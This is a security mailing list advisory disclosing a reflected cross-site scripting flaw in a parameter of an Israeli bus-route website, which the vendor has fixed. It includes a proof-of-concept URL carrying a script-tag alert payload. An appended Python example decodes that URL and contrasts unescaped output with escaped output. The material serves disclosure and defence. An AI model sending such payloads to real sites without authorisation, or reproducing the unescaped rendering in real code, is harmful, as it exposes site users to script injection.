lists.openwall.net - Open Source and information security mailing list archives
Message-ID: <CABsCEg2cmCbLAGLZWNu1R-toR9njYkd4qcoUXgoJL4-nx1cZ5g@mail.gmail.com>
Date: Mon, 8 Jul 2013 16:29:15 +0300
From: LIAD Mizrachi <liadmz@...il.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Bus.co.il - Route.asp Cross-site Scripting vulnerability

Advisory: www.bus.co.il - Route.asp Cross-site Scripting vulnerability
Author: Liad Mizrachi
Vendor URL: http://www.bus.co.il
Vulnerability Status: Fixed

==========================
Vulnerability Description
==========================
'Name1' & 'Name2' - Parameters in "Route.asp" are prone to an XSS.

==========================
PoC
==========================
// IE 9 & FF 21.0
http://www.bus.co.il/otobusim/Front2007/Route.asp?RouteID=1&PlaceID1=196357&BuildingNumber1=0&PlaceID2=347360&BuildingNumber2=0&Name1=%3cscript%3ealert(%22XSS%22)%3c/script%3e&Name2=%D7%91%D7%AA+%D7%99%D7%9D+-+%D7%A1%D7%9E%D7%98%D7%AA+%D7%94%D7%A8%D7%90%D7%A9%D7%95%D7%A0%D7%99%D7%9D&StartPlaceID1=639500&EndPlaceID1=619400&DepTime1=17:02&ArrTime1=17:25&TravelID1=380437889&LineID1=4563409&LineCompanyID1=1010&BeforeWalkTime1=0:01&AfterWalkTime=5.17572916666653E-03&LanguageID=&Design=2007

==========================
Solution
==========================
Fixed by vendor (verified)

==========================
Disclosure Timeline
==========================
24-June-2013 - vendor informed by mail
27-June-2013 - fixed by the vendor

==========================
References
==========================
http://www.bus.co.il/
http://picturepush.com/public/13422462

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
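The advisory above only gives the PoC URL and says the Name1/Name2 parameters are reflected. The following is an added example, not part of the original post and not the vendor's code: it parses that PoC URL exactly as posted, shows what the server actually received in Name1 (the raw script tag) and in Name2 (a legitimate Hebrew street name), and places a hypothetical unescaped rendering of the two parameters beside the escaped rendering that fixes the bug. The two render_* functions are stand-ins for a sink the advisory never showed (the Route.asp source was not published), and reflects_unescaped is the check a tester would script to confirm the report and to verify the vendor's fix.

```python
# Added example (not from the advisory): decode the PoC URL, then contrast an
# unescaped reflection of Name1/Name2 with an HTML-escaped one.
import html
from urllib.parse import parse_qs, urlsplit

# The PoC URL as it appears in the advisory, embedded here as a constant.
POC_URL = (
    "http://www.bus.co.il/otobusim/Front2007/Route.asp?RouteID=1&PlaceID1=196357"
    "&BuildingNumber1=0&PlaceID2=347360&BuildingNumber2=0"
    "&Name1=%3cscript%3ealert(%22XSS%22)%3c/script%3e"
    "&Name2=%D7%91%D7%AA+%D7%99%D7%9D+-+%D7%A1%D7%9E%D7%98%D7%AA+%D7%94%D7%A8%D7%90%D7%A9%D7%95%D7%A0%D7%99%D7%9D"
    "&StartPlaceID1=639500&EndPlaceID1=619400&DepTime1=17:02&ArrTime1=17:25"
    "&TravelID1=380437889&LineID1=4563409&LineCompanyID1=1010"
    "&BeforeWalkTime1=0:01&AfterWalkTime=5.17572916666653E-03&LanguageID=&Design=2007"
)


def route_params(url):
    """Return the query string of the PoC as a dict of single decoded values.

    keep_blank_values keeps LanguageID= (present but empty) in the result,
    which matters when auditing every parameter the page reflects.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in params.items()}


def render_vulnerable(name1, name2):
    """Hypothetical stand-in for the original sink: values concatenated into
    the HTML unescaped, so a script tag in Name1 becomes live markup."""
    return (
        '<div class="route"><span class="from">' + name1 + "</span>"
        ' &rarr; <span class="to">' + name2 + "</span></div>"
    )


def render_fixed(name1, name2):
    """Same markup with html.escape on every untrusted value. quote=True also
    escapes quotes, which matters if a value ever lands inside an attribute."""
    return (
        '<div class="route"><span class="from">' + html.escape(name1, quote=True) + "</span>"
        ' &rarr; <span class="to">' + html.escape(name2, quote=True) + "</span></div>"
    )


def reflects_unescaped(page, payload):
    """Verification check: True if the raw payload is reflected byte-for-byte,
    which is how a tester confirms the report and later re-tests the fix."""
    return payload in page


if __name__ == "__main__":
    p = route_params(POC_URL)
    print("Name1 received by server:", p["Name1"])
    print("Name2 received by server:", p["Name2"])
    print("vulnerable reflects payload:", reflects_unescaped(render_vulnerable(p["Name1"], p["Name2"]), p["Name1"]))
    print("fixed reflects payload:     ", reflects_unescaped(render_fixed(p["Name1"], p["Name2"]), p["Name1"]))
    print(render_fixed(p["Name1"], p["Name2"]))
```

Note that escaping on output does not damage the legitimate Name2 value: the Hebrew street name passes through html.escape untouched, so the fix costs nothing for normal traffic while neutralising the Name1 payload into `&lt;script&gt;`. The same check should be run against every reflected parameter, not only the two named in the report.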